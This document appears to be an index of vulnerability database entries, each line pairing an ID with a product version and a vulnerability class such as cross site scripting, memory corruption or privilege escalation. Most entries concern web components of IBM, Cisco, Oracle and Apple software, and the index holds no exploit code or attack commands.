[102860] IBM QRadar 7.2/7.3 Web UI cross site scripting
[102803] Cisco Prime Infrastructure/Evolved Programmable Network Web UI XML External Entity
[102786] Boa Webserver 0.94.14rc21 GET /cgi-bin/wapopen directory traversal
[102777] IBM Sterling B2B Integrator Standard Edition 5.2 Web UI cross site scripting
[102773] IBM Sterling B2B Integrator Standard Edition 5.2 Web UI cross site scripting
[102764] Cisco WebEx Network Recording Player up to T29.13/T30.16/T31.9 ARF File memory corruption
[102732] Trihedral VTScada up to 11.2.25 Web Server File information disclosure
[102725] IBM WebSphere MQ 8.0/9.0 MQXR Channel privilege escalation
[102563] Webhammer WP Custom Fields Search Plugin 0.3.28 on WordPress cross site scripting
[102341] IBM Jazz Foundation Web UI cross site scripting
[102280] Cisco Unified Communications Domain Manager 8.1(7)ER1 Web-based GUI Redirect
[102279] Cisco Unified Communications Domain Manager 8.1(7)ER1 Web-based GUI sql injection
[102258] Cloud Foundry JSON Web Token Library privilege escalation
[102150] IBM Business Process Manager 8.0/8.5 Web UI cross site scripting
[102148] IBM WebSphere Application Server SOAP Request information disclosure
[102064] ARM Trusted Firmware up to 1.3 Debug Interface privilege escalation
[102051] IBM Security Access Manager for Web 9.0.0 privilege escalation
[102050] IBM Security Access Manager for Web 9.0.0 weak encryption
[101866] Juniper Junos Space up to 16.1 Administrative Interface Reflected cross site scripting
[101803] Netgear WNR2000 Administration Webapp memory corruption
[101799] IBM iNotes 8.5/9.0 Web UI cross site scripting
[101746] Trend Micro ServerProtect for Linux 3.0 Web-based Management Console privilege escalation
[101618] IBM Tivoli Federated Identity Manager 6.2 Web UI cross site scripting
[101613] IBM Distributed Marketing/Marketing Platform 8.6/9.0/9.1/10.0 Web Application privilege escalation
[101498] 3S-Smart CODESYS Web Server up to 2.3 File Upload privilege escalation
[101497] 3S-Smart CODESYS Web Server up to 2.3 XML memory corruption
[101476] Cisco TelePresence IX5000 8.2.0 Web Framework directory traversal
[101439] McAfee Network Data Loss Prevention 9.3.x Web Server HTTP Method information disclosure
[101356] Apple iCloud up to 6.2.0 on Windows WebKit memory corruption
[101329] Apple watchOS up to 3.2.1 WebKit JSObject::ensureLength memory corruption
[101316] Apple tvOS up to 10.2.0 WebKit Universal cross site scripting
[101315] Apple tvOS up to 10.2.0 WebKit memory corruption
[101314] Apple tvOS up to 10.2.0 WebKit memory corruption
[101313] Apple tvOS up to 10.2.0 WebKit memory corruption
[101312] Apple tvOS up to 10.2.0 WebKit memory corruption
[101311] Apple tvOS up to 10.2.0 WebKit memory corruption
[101310] Apple tvOS up to 10.2.0 WebKit memory corruption
[101309] Apple tvOS up to 10.2.0 WebKit JSObject::ensureLength memory corruption
[101308] Apple tvOS up to 10.2.0 WebKit memory corruption
[101307] Apple tvOS up to 10.2.0 WebKit privilege escalation
[101306] Apple tvOS up to 10.2.0 WebKit Universal cross site scripting
[101086] Siemens SIMATIC WinCC up to V7.2 DCOM Interface privilege escalation
[101063] IBM WebSphere Application Server 8.0/8.5.5 Admin Console privilege escalation
[101059] IBM Rational Quality Manager Web UI cross site scripting
[101056] IBM Cognos Analytics 11.0 Web UI cross site scripting
[101055] Cisco WebEx Meetings Server 2.5/2.6/2.7/2.8 Meeting information disclosure
[100917] Trend Micro OfficeScan up to 11.0 SP1/XG Blocked Website cross site scripting
[100901] Advantech WebAccess up to 8.1 Absolute directory traversal
[100890] IBM WebSphere Cast Iron 7.0.0/7.5.0.0 DNS/HTTP privilege escalation
[100889] IBM WebSphere Cast Iron 7.0.0/7.5.0.0 XML External Entity
[100836] Trend Micro OfficeScan up to 11/XG Web-Console Password privilege escalation
[100824] IBM WebSphere Portal 8.5/9.0 privilege escalation
[100802] Advantech WebAccess up to 8.1 upAdminPg.asp Password information disclosure
[100720] Palo Alto PAN-OS up to 6.1.16/7.0.14/7.1.8/8.0.1 GlobalProtect External Interface User 7PK Security Features
[100668] Webmin up to 1.829 cross site scripting
[100650] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 cross site request forgery
[100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
[100565] CopySafe Web Protection Plugin up to 2.5 on WordPress cross site request forgery
[100417] Palo Alto PAN-OS up to 7.0.14 GlobalProtect External Interface cross site scripting
[100408] Cisco Prime Infrastructure 2.2(2) Web Framework cross site scripting
[100395] IBM Curam Social Program Management 5.2/6.0/7.0 Web UI cross site scripting
[100264] Drupal up to 8.2.7/8.3.0 RESTful Web Services privilege escalation
[100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) Data Processing Error
[100147] Oracle up to 16.2 Web Access privilege escalation
[100146] Oracle up to 16.2 Web Access privilege escalation
[100143] Oracle up to 16.2 Web Access privilege escalation
[100104] Oracle MICROS Relate CRM Software up to 15.0 Web Services memory corruption
[100095] Oracle Hospitality OPERA 5 Property Services up to 5.5.1.x OXI Interface information disclosure
[100026] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation
[99994] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99993] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99991] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99990] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99989] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Catalog Mover privilege escalation
[99988] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99987] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99986] Oracle WebLogic Server 12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Servlet Runtime privilege escalation
[99984] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Web Services privilege escalation
[99982] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99981] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Samples memory corruption
[99980] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Catalog Mover privilege escalation
[99979] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation
[99977] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation
[99976] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Blob Server privilege escalation
[99975] Oracle WebCenter Content 11.1.1.7/11.1.1.9/12.2.1.0/12.2.1.1/12.2.1.2 Content Server privilege escalation
[99974] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation
[99973] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation
[99972] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation
[99970] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 privilege escalation
[99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat privilege escalation
[99968] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Samples privilege escalation
[99964] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Struts 2 privilege escalation
[99927] IBM Financial Transaction Manager 3.0.0.x Web UI cross site scripting
[99873] IBM Tivoli Application Dependency Discovery Manager 7.2.2/7.3 Web UI cross site scripting
[99842] radare2 1.3.0 Web Assembly File wasm.c consume_init_expr memory corruption
[99838] Moxa AWK-3131A Web Application information disclosure
[99837] Moxa AWK-3131A 1.1 Web Application /forms/web_runScript denial of service
[99836] Moxa AWK-3131A 1.1 Web Application information disclosure
[99834] Moxa AWK-3131A 1.1 Web Application denial of service
[99796] QEMU Human Monitor Interface memory corruption
[99742] Unitrends Enterprise Backup up to 9.1.1 Web Server api/includes/users.php privilege escalation
[99739] Unitrends Enterprise Backup up to 8.x Web Server privilege escalation
[99732] Moxa AWK-3131A 1.1 Web Application cross site request forgery
[99712] radare2 1.3.0 Web Assembly File libr/util/uleb128.c read_u32_leb128 memory corruption
[99553] Cesanta MongooseOS/Mongoose Embedded Web Server Library mongoose.c mg_http_multipart_wait_for_boundary memory corruption
[99483] Summer Baby Zoom Wifi Monitor / Internet Viewing System MySnapCam Web Service privilege escalation
[99323] Trend Micro InterScan Web Security Virtual Appliance 6.5 cross site scripting
[99322] Trend Micro InterScan Web Security Virtual Appliance 6.5 Key Management Error
[99321] Trend Micro InterScan Web Security Virtual Appliance 6.5 FTP privilege escalation
[99303] IBM Cognos Analytics 11.0 Web UI cross site scripting
[99302] IBM Cognos Analytics 11.0 Web UI cross site scripting
[99295] Horde Groupware Webmail Edition up to 5.2.17 Horde_Crypt privilege escalation
[99294] Horde Groupware Webmail Edition up to 5.2.17 Horde_Crypt privilege escalation
[99178] Huawei Tecal RHXXXX Web UI information disclosure
[99140] IBM Kenexa LMS on Cloud up to 14.0.0 Web UI cross site scripting
[99132] IBM Rational Quality Manager 4.0/5.0/6.0 Web UI cross site scripting
[98990] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting
[98986] IBM TRIRIGA 3.3/3.4/3.5 Web UI cross site scripting
[98984] Revive Adserver up to 3.2.4/4.0.0 Web Installer Reflected cross site scripting
[98973] ownCloud Server up to 9.0.3 WebDAV Copy privilege escalation
[98969] Revive Adserver up to 3.2.2 Admin Interface cross site request forgery
[98968] Revive Adserver up to 3.2.2 User Interface banner-acl.php cross site request forgery
[98967] Revive Adserver up to 3.2.2 User Interface Persistent cross site scripting
[98964] Revive Adserver up to 3.2.2 User Interface campaign-zone.php Persistent cross site scripting
[98903] Apple macOS Server up to 5.2 Web Server Timeout denial of service
[98901] Apple tvOS up to 10.1 WebKit Universal cross site scripting
[98900] Apple tvOS up to 10.1 WebKit Bound Information memory corruption
[98899] Apple tvOS up to 10.1 WebKit Function.caller privilege escalation
[98898] Apple tvOS up to 10.1 WebKit disconnectSubframes Universal cross site scripting
[98897] Apple tvOS up to 10.1 WebKit privilege escalation
[98896] Apple tvOS up to 10.1 WebKit denial of service
[98895] Apple tvOS up to 10.1 WebKit privilege escalation
[98894] Apple tvOS up to 10.1 WebKit memory corruption
[98893] Apple tvOS up to 10.1 WebKit memory corruption
[98892] Apple tvOS up to 10.1 WebKit memory corruption
[98891] Apple tvOS up to 10.1 WebKit memory corruption
[98890] Apple tvOS up to 10.1 WebKit memory corruption
[98889] Apple tvOS up to 10.1 WebKit memory corruption
[98888] Apple tvOS up to 10.1 WebKit memory corruption
[98887] Apple tvOS up to 10.1 WebKit memory corruption
[98886] Apple tvOS up to 10.1 WebKit memory corruption
[98885] Apple tvOS up to 10.1 WebKit memory corruption
[98884] Apple tvOS up to 10.1 WebKit memory corruption
[98883] Apple tvOS up to 10.1 WebKit memory corruption
[98882] Apple tvOS up to 10.1 WebKit memory corruption
[98881] Apple tvOS up to 10.1 WebKit information disclosure
[98880] Apple tvOS up to 10.1 WebKit memory corruption
[98879] Apple tvOS up to 10.1 WebKit memory corruption
[98878] Apple tvOS up to 10.1 WebKit privilege escalation
[98845] Apple watchOS up to 3.1 WebKit memory corruption
[98844] Apple watchOS up to 3.1 WebKit denial of service
[98843] Apple watchOS up to 3.1 WebKit privilege escalation
[98727] Apple macOS up to 10.12.3 WebKit constructJSReadableStreamDefaultReader memory corruption
[98725] Apple macOS up to 10.12.3 WebKit Address privilege escalation
[98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption
[98380] Cisco IOS XE 16.2.1 Web Framework privilege escalation
[98310] IBM WebSphere MQ 8.0.0.6 Channel Agent denial of service
[98261] Cisco Unified Communications Manager 11.5(1.11007.2) Web Framework cross site request forgery
[98256] Cisco Web Security Appliance 8.5.3-069/9.1.1-074/9.1.2-010 URL Filter memory corruption
[98251] Cisco WebEx Meetings Server 2.6 XML External Entity
[98192] Cisco WebEx Meetings Server 2.5/2.6/2.7 weak authentication
[98093] Microsoft SharePoint Server/Office Web Apps 2010 SP2 information disclosure
[98091] Microsoft SharePoint Server/Office Web Apps 2010 SP2 memory corruption
[98089] Microsoft Office Web Apps 2013 SP1 memory corruption
[97929] Intel VirusScan Enterprise Linux up to 2.0.3 Webserver NailsConfig.html File privilege escalation
[97900] IBM WebSphere Application Server 8.0/8.5/8.5.5/9.0 OIDC TAI privilege escalation
[97880] Goahead Web Server mail.htm privilege escalation
[97879] Goahead Web Server HTTP GET Request system.ini information disclosure
[97823] Joomla CMS com_webgrouper sql injection
[97737] CMS Made Simple 2.1.6 moduleinterface.php cross site scripting
[97616] IBM QRadar 7.2 Web UI cross site scripting
[97606] IBM QRadar 7.2 Web UI cross site scripting
[97601] IBM WebSphere MQ 8.0 memory corruption
[97574] qBittorrent up to 3.3.10 WebUI privilege escalation
[97573] qBittorrent up to 3.3.10 WebUI cross site scripting
[97365] Veritas NetBackup 6.x/7.x/8.0 Corba Interface privilege escalation
[97296] IBM WebSphere MQ 8.0 MQ Clustering privilege escalation
[97284] Plone up to 5.1a1 WebDAV Request privilege escalation
[97223] IBM iNotes 8.5/9.0 Web UI cross site scripting
[97212] IBM WebSphere MQ 8.0 Queue Manager privilege escalation
[97211] IBM WebSphere MQ 8.0 Queue Manager privilege escalation
[97209] IBM WebSphere MQ 8.0 information disclosure
[97208] IBM WebSphere MQ 8.0 MQ Channel Data Processing Error
[97202] Cisco FirePOWER Management Center 6.2.1 Web Framework cross site scripting
[97193] Cisco Unified Communications Manager 11.5(1.11007.2) Web Framework information disclosure
[97191] Cisco Unified Communications Manager 12.0(0.99999.2) Web Framework cross site scripting
[97187] Cisco Email Security Appliance/Web Security Appliance 9.9.9-894/10.0.0-203/WSA10.0.0-233 MIME Scanner privilege escalation
[97150] Apple tvOS up to 9.x WebKit memory corruption
[97079] InterSect Alliance SNARE Epilog for UNIX 1.5 Web Admin Portal cross site scripting
[97070] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console cross site scripting
[97069] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console privilege escalation
[97068] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console information disclosure
[97067] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console privilege escalation
[97049] IBM Security Access Manager For Web up to 9.0.2.0 weak encryption
[97015] IBM WebSphere Message Broker 9.0/10.0 7PK Security Features
[96937] Advantech WebAccess 8.1 sql injection
[96935] Advantech WebAccess 8.1 weak authentication
[96894] Moxa SoftCMS up to 1.5 Web Server denial of service
[96883] Schneider Electric Magelis Web Server denial of service
[96878] Schneider Electric Magelis Web Server Connection denial of service
[96866] OSIsoft PI Web API 2015 R2 1.5.1 privilege escalation
[96834] Sauter NovaWeb web HMI Cookie 7PK Security Features
[96829] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5/9.0 Admin Console cross site scripting
[96731] IBM Maximo Asset Management Web UI cross site scripting
[96715] IBM Security Directory Server Web Administration Tool privilege escalation
[96608] IBM Tivoli Key Lifecycle Manager 2.0.1/2.5/2.6 Web UI cross site scripting
[96599] IBM Security Access Manager For Web 7.0.0/8.0.0/9.0.0 privilege escalation
[96516] Cisco Firepower System Software 5.3.0/5.4.0/6.0.0/6.0.1/6.1.0 Web Content Blocker privilege escalation
[96472] IBM WebSphere Application Server cross site scripting
[96462] IBM WebSphere Application Server denial of service
[96444] IBM WebSphere Message Broker WebAdmin Context Directory information disclosure
[96397] IBM Security Access Manager For Web sql injection
[96396] IBM Security Access Manager For Web URL Parameter information disclosure
[96395] IBM Security Access Manager For Web information disclosure
[96392] IBM Security Access Manager For Web cross site request forgery
[96391] IBM Security Access Manager For Web XML External Entity
[96389] IBM Security Access Manager For Web File Name information disclosure
[96388] IBM Security Access Manager For Web File Permission privilege escalation
[96387] IBM Security Access Manager For Web information disclosure
[96386] IBM Security Access Manager For Web cross site scripting
[96385] IBM Security Access Manager For Web privilege escalation
[96384] IBM Security Access Manager For Web Patch weak authentication
[95994] Cisco WebEx Meeting Center Redirect
[95992] Cisco WebEx Meetings Server 2.7 Hostname information disclosure
[95991] Cisco WebEx Meetings Server 2.6 privilege escalation
[95990] Cisco WebEx Meetings Server 2.6 Password privilege escalation
[95989] Cisco WebEx Meetings Server 2.6 cross site request forgery
[95957] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption
[95956] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption
[95955] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption
[95954] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption
[95924] Apple tvOS up to 10.1.0 WebKit information disclosure
[95923] Apple tvOS up to 10.1.0 WebKit information disclosure
[95922] Apple tvOS up to 10.1.0 WebKit memory corruption
[95921] Apple tvOS up to 10.1.0 WebKit memory corruption
[95920] Apple tvOS up to 10.1.0 WebKit memory corruption
[95919] Apple tvOS up to 10.1.0 WebKit memory corruption
[95918] Apple tvOS up to 10.1.0 WebKit HTMLFormElement::reset memory corruption
[95917] Apple tvOS up to 10.1.0 WebKit memory corruption
[95916] Apple tvOS up to 10.1.0 WebKit information disclosure
[95912] Apple watchOS up to 3.1.2 WebKit information disclosure
[95911] Apple watchOS up to 3.1.2 WebKit memory corruption
[95869] Cisco WebEx Browser Extension memory corruption
[95741] Moodle 2.x/3.x Web Service privilege escalation
[95736] Moodle 2.x/3.x Web Service Token privilege escalation
[95678] Oracle up to 16.2 Web Access privilege escalation
[95675] Oracle up to 16.2 Web Access privilege escalation
[95597] Oracle Marketing up to 12.2.6 User Interface privilege escalation
[95595] Oracle Knowledge Management 12.1.1/12.1.2/12.1.3 User Interface privilege escalation
[95583] Oracle CRM Technical Foundation 12.1.3 User Interface privilege escalation
[95556] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1 Core Components unknown vulnerability
[95547] EMC Documentum Webtop/TaskSpace/Capital Projects 6.8 cross site scripting
[95538] Finance Website Script /user.profile.php sql injection
[95536] Auction Website Script /news.dtl.php sql injection
[95429] Inout StickBoard 1.0 /admin/pin/websitepin privilege escalation
[95285] Synacor Zimbra Collaboration up to 8.6 Administration Interface cross site request forgery
[95199] cPanel entropysearch.cgi Website information disclosure
[95112] Splunk Enterprise up to <=5.0.16 Web privilege escalation
[95098] IBM WebSphere MQ 7.0.1/7.1/7.5/8.0/9.0 Deserialize JMSObjectMessage Java privilege escalation
[94920] aWeb Cart Watching System for Virtuemart up to 2.6.0 on Joomla sql injection
[94617] IMP Horde Groupware/Horde Groupware Webmail Edition up to 5.2.15 data:text/html cross site scripting
[94340] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94339] Apple iCloud up to 6.0 on Windows WebKit information disclosure
[94338] Apple iCloud up to 6.0 on Windows WebKit information disclosure
[94337] Apple iCloud up to 6.0 on Windows WebKit Javascript unknown vulnerability
[94336] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94335] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94334] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94333] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94332] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94331] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94330] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94329] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94328] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94327] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94326] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94325] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94324] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94323] Apple iCloud up to 6.0 on Windows WebKit State information disclosure
[94322] Apple iCloud up to 6.0 on Windows WebKit memory corruption
[94321] Apple iCloud up to 6.0 on Windows WebKit State memory corruption
[94320] Apple iCloud up to 6.0 on Windows WebKit memory corruption
[94319] Apple iCloud up to 6.0 on Windows WebKit memory corruption
[94318] Apple iCloud up to 6.0 on Windows WebKit memory corruption
[94293] Apple tvOS up to 10.0 WebKit memory corruption
[94292] Apple tvOS up to 10.0 WebKit information disclosure
[94291] Apple tvOS up to 10.0 WebKit information disclosure
[94290] Apple tvOS up to 10.0 WebKit memory corruption
[94289] Apple tvOS up to 10.0 WebKit memory corruption
[94288] Apple tvOS up to 10.0 WebKit memory corruption
[94287] Apple tvOS up to 10.0 WebKit memory corruption
[94286] Apple tvOS up to 10.0 WebKit memory corruption
[94285] Apple tvOS up to 10.0 WebKit memory corruption
[94284] Apple tvOS up to 10.0 WebKit memory corruption
[94283] Apple tvOS up to 10.0 WebKit memory corruption
[94282] Apple tvOS up to 10.0 WebKit memory corruption
[94281] Apple tvOS up to 10.0 WebKit memory corruption
[94280] Apple tvOS up to 10.0 WebKit memory corruption
[94279] Apple tvOS up to 10.0 WebKit memory corruption
[94278] Apple tvOS up to 10.0 WebKit memory corruption
[94277] Apple tvOS up to 10.0 WebKit memory corruption
[94276] Apple tvOS up to 10.0 WebKit information disclosure
[94275] Apple tvOS up to 10.0 WebKit memory corruption
[94274] Apple tvOS up to 10.0 WebKit memory corruption
[94273] Apple tvOS up to 10.0 WebKit memory corruption
[94272] Apple tvOS up to 10.0 WebKit memory corruption
[94165] Cisco Prime Collaboration Assurance 10.5(1)/10.6 Web Framework cross site scripting
[94161] Cisco Web Security Appliance 9.0.1-162/9.1.1-074 HTTP URL Parser denial of service
[94051] phpMyAdmin up to 4.6.3/4.4.15.7/4.0.10.16 User Interface Preference sql injection
[94020] Cisco Web Security Appliance 9.0.1-162/9.1.1-074 privilege escalation
[93903] Boa Webserver 0.92r HTTP GET send_redirect privilege escalation
[93791] VMware vRealize Automation 7.1.x Identity Manager /SAAS/WEB-INF File privilege escalation
[93783] IBM Security Access Manager for Web privilege escalation
[93774] IBM WebSphere Application Server up to 16.0.0.2 Exception information disclosure
[93299] Cisco Identity Services Engine 1.3(0.876) Web Framework sql injection
[93297] Cisco Prime Collaboration Provisioning 10.6 Web Framework cross site scripting
[93294] Cisco IP Interoperability/Collaboration System 4.10(1) Web Framework cross site scripting
[93276] Imperva SecureSphere Web Application Firewall privilege escalation
[93163] HPE Financial Transaction Manager up to 3.0.0.x/3.0.1.0 iFix0001 Web UI cross site scripting
[93147] Apple iCloud up to 6.0 on Windows WebKit memory corruption
[93146] Apple iCloud up to 6.0 on Windows WebKit User information disclosure
[93140] Cisco Email Security Appliance/Web Security Appliance Content Filter privilege escalation
[93130] Cisco Email Security Appliance/Web Security Appliance Multipurpose Internet Mail Extensions Scanner 7PK Error
[93097] IBM WebSphere Commerce 6.0/7.0/8.0 privilege escalation
[93085] Apple tvOS up to 10.0 WebKit memory corruption
[93084] Apple tvOS up to 10.0 WebKit memory corruption
[93083] Apple tvOS up to 10.0 WebKit information disclosure
[93009] Cisco Meeting Server Web Bridge cross site request forgery
[92993] Oracle Secure Global Desktop 4.7/5.2 Web Services privilege escalation
[92931] Oracle JD Edwards EnterpriseOne Tools 9.1 Web Runtime SEC memory corruption
[92926] Oracle Hospitality OPERA 5 Property Services up to 5.5.1.0 OPERA Xchange Interface OXI privilege escalation
[92919] Oracle Application Testing Suite 12.5.0.1/12.5.0.2/12.5.0.3 Load Testing for Web Apps weak encryption
[92784] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 WLS-WebServices memory corruption
[92783] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1 memory corruption
[92782] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 privilege escalation
[92778] Oracle iPlanet Web Server 7 Security memory corruption
[92777] Oracle iPlanet Web Proxy Server 4 Security memory corruption
[92776] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 JavaServer Faces memory corruption
[92750] Oracle WebLogic Server 10.3.6.0/12.1.3.0 Web Container denial of service
[92749] Oracle WebCenter Sites 12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Security 7PK Security Features
[92550] IBM WebSphere up to 7.0.0.41/8.0.0.12/8.5.5.10/9.0.0.1 Cookie Deserialization privilege escalation
[92501] Symantec Web Gateway up to 5.1.1.24/5.2.1.80/5.2.2.118 new_whitelist.php privilege escalation
[92495] Cisco FirePOWER Management Center 6.0.1 Web Console File information disclosure
[92476] Cisco ASA DHCP Relay Interface denial of service
[92456] INDAS Web SCADA 2 directory traversal
[92443] IBM WebSphere Application Server up to 7.0.0.42/8.0.0.12/8.5.5.10/9.0.0.1 Java privilege escalation
[92416] Sparkasse Bank WebSite blind.php cross site scripting
[92415] Sparkasse Bank WebSite index.php cross site scripting
[92287] Cisco Web Security Appliance 9.0.1-162 FTP Throttling memory corruption
[92276] IBM WebSphere Application Server up to 16.0.0.2 Web UI cross site scripting
[92173] WildFly 10.0.0 Undertow Web Server Header privilege escalation
[92170] Red Hat JBoss Web Server 2.1 mod_cluster privilege escalation
[92169] IBM WebSphere Application Server Redirect
[92167] IBM Connections up to 4.5 CR4/5.0 CR3/5.5 Web UI cross site scripting
[92166] IBM Connections up to 4.5 CR4/5.0 CR3/5.5 Web UI cross site scripting
[92165] IBM Connections up to 4.5 CR4/5.0 CR3/5.5 Web UI cross site scripting
[92162] IBM WebSphere MQ up to 7.5.0.6/8.0.0.4 Protocol Flow Data Processing Error
[92152] Apple tvOS up to 9.x WebKit memory corruption
[92151] Apple tvOS up to 9.x WebKit memory corruption
[92150] Apple tvOS up to 9.x WebKit memory corruption
[92149] Apple tvOS up to 9.x WebKit memory corruption
[92148] Apple tvOS up to 9.x WebKit memory corruption
[92147] Apple tvOS up to 9.x WebKit memory corruption
[92146] Apple tvOS up to 9.x WebKit memory corruption
[92145] Apple tvOS up to 9.x WebKit memory corruption
[92144] Apple tvOS up to 9.x WebKit memory corruption
[92143] Apple tvOS up to 9.x WebKit memory corruption
[92142] Apple tvOS up to 9.x WebKit memory corruption
[92141] Apple tvOS up to 9.x WebKit privilege escalation
[92123] Apple watchOS up to 2.x WebKit memory corruption
[91976] Facebook WebSite Bugbounty cross site scripting
[91974] Twitter WebSite Groups 31-twitter-basics cross site scripting
[91932] AiCart Shopping CMS 2.0 Admin Interface privilege escalation
[91888] Cisco Cloud Services Platform 2100 2.0 Web-based GUI privilege escalation
[91803] SonicWALL Viewpoint 6.0 SP2 FTP Usage/Top Users of FTP/Web Usage Top Sites Reflected cross site scripting
[91799] SonicWALL Viewpoint 6.0 SP2 Custom Report – Website Filtering Persistent cross site scripting
[91705] Symantec Web Gateway RAR Decompression memory corruption
[91704] Symantec Web Gateway RAR Decompression information disclosure
[91685] Cisco WebEx Meetings Server 2.6 Account-Validation privilege escalation
[91661] Cisco Web Security Appliance up to 9.5.0-444 HTTP Request denial of service
[91648] Cisco WebEx Meetings Server 2.6 privilege escalation
[91634] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5/9.0.0.0 Response information disclosure
[91503] PHP up to 7.0.9 ext/curl/interface.c memory corruption
[91484] Medical Center Columbia WebSite Profiles /members/profiles.php sql injection
[91410] IBM WebSphere Portal 6.1/7.0/8.0/8.5 File Upload privilege escalation
[91354] Red Hat JBoss Operations Network up to 3.3.6 Web Console privilege escalation
[91157] McAfee Web Gateway 6.8.6.x Incident Manager cross site scripting
[91156] McAfee Web Gateway 6.8.6.x E-Mail Gateway / HTTP Method Filter List cross site scripting
[91155] McAfee Web Gateway 6.8.6.x cross site scripting
[91154] McAfee Web Gateway 6.8.6.x HMS AGENTS - Private Key Handler/Remote Service cross site scripting
[91153] McAfee Web Gateway 6.8.6.x Account Overview - Allows to manage the accounts cross site scripting
[91094] Barracuda Web Firewall 660 privilege escalation
[91087] Bank of America Web Site cross site scripting
[91075] Cisco WebEx Meetings Player T29.10 WRF File privilege escalation
[91074] Cisco WebEx Meetings Player T29.10 WRF File denial of service
[91032] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting
[91031] IBM Connections up to 5.0 CR3/5.5 Web UI cross site scripting
[91030] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting
[91028] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting
[91027] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting
[91026] IBM Connections up to 5.0 CR3/5.5 Web UI cross site scripting
[91025] IBM Connections up to 5.0 CR3/5.5 Web UI cross site scripting
[90997] IBM BigFix Platform up to 9.5.1 WebReports information disclosure
[90967] Red Hat CloudForms 4.1 Web UI privilege escalation
[90953] Micro Focus Novell Groupwise up to 2014 R2 Service Pack 1 WebAccess/Post Office Agent memory corruption
[90896] Cisco WebEx Meetings Server 2.6 privilege escalation
[90892] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 HttpSessionIdReuse memory corruption
